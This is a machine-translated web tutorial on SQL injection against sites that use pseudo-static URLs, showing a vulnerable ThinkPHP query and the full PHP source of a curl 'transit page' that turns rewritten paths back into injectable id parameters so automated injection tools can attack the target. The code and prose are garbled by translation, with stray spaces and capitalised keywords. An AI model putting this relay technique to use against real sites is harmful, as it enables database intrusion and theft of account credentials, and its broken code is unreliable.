As for the pseudo-static website injection method, laruence literacy comes. Generally, the url of the dynamic script website is similar to the following:
Http://www.bkjia.com/news. php? Id = 111
This is what happens after pseudo-static operations.
Http://www.bkjia.com/news. php/id/111.html
The slash "/slash is used to replace the Operator and add .html at the bottom. As a result, the tool cannot be directly used for injection,
Now let's discuss how to use tools for injection. We all know that cookies are being injected. In fact, the principles are similar,
We write a dynamic web page script to construct our own url rules and access the target page through this page!
That is, we change the pseudo-static url rule back to the original? Id = 123 to form a common url that can be easily injected.
Okay, try it out! I set up a simple injection point using thikphp locally,
Because thinkphp comes with simple pseudo-static, it is easier to demonstrate.
The SQL statement for this injection point is as follows: the id for receiving get
SELECT account AS username, password FROM think_user WHERE id = 1
The page url is as follows:
Http://www.bkjia.com/index. php/index/id/111.html
Change the value by 111 to inject!
If I am familiar with php, use php to write an injection transit page.
Source code of the tmd. php transit page:
Set_time_limit (0 );
$ Id = $ _ GET ["id"];
$ Id = str_replace ("", "% 20", $ id );
$ Id = str_replace ("=", "% 3D", $ id );
// $ Url = "http://www.bkjia.com/test/id-shortid.html";
$ Url = "http://www.bkjia.com/inj/index. php/index/id/$id.html";
// Echo $ url;
$ Ch = curl_init ();
Curl_setopt ($ ch, CURLOPT_URL, "$ url ");
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
Curl_setopt ($ ch, CURLOPT_HEADER, 0 );
$ Output = curl_exec ($ ch );
Curl_close ($ ch );
Print_r ($ output );
Save this file as tmd. php. the url of this file is as follows:
Http://www.bkjia.com/inj/tmd. php.
Place the $ id generated for injection at the specified location based on the pseudo-static rules on the target page. As shown above.
The principle is to use curl to obtain the content of the target page (same as accessing the target page directly ),
You only need to modify the content of $ url to adapt to various pseudo-static rules.
The script is relatively simple. If you have children's shoes, you can add post, proxy, referer, and other functions as needed.
Are we now accessing http://www.bkjia.com/inj/tmd. php? Id = 1, 111,
That is equivalent to accessing http://www.bkjia.com/inj/index. php/index/id/111.html,
Now we can put http://www.bkjia.com/inj/tmd. php? Id = 111 the connection is injected into the tool.